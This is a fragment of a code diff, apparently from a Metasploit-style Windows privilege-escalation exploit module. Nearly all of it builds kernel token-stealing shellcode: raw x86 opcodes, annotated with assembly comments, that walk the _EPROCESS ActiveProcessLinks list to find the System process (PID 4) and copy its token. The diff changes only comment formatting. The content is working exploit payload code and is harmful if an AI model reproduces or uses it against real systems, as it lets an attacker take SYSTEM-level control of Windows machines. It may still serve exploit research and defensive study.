tokenstealing << "\x89\x1d" + [backup_token].pack('V')# mov dword ptr ds:backup_token, ebx # Optionaly write a copy of the token to the address provided
tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"# sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
149
+
tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"# sub eax, 88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
148
150
tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00"# cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
149
-
tokenstealing << "\x75\xe8"# jne 0000101e ======================
150
-
tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"# mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
151
+
tokenstealing << "\x75\xe8"# jne 0000101e ======================|
152
+
tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"# mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX